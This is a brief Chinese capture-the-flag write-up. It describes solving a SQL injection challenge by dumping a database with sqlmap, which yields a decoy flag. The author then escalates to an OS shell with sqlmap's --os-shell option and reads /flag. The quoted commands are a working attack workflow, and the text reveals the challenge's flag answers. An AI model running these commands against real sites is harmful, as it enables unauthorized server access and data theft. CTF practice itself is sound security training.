在这道题上面困了有一会儿,之前一直拿到的是假FLAG,所以简单记录一下
直接尝试用SQLmap跑
后在数据库word表的articles列
拿下FLAG:qsnctf{sql+so+easy!!!!}
得到假的FLAG
根据提示
尝试转换思路,用SQLmap执行shell
sqlmap -u "http://challenge.qsnctf.com:32030/?id=1" --os-shell
查找“flag”
find / -name "flag"
发现/flag
目录,拿下FLAG
cat /flag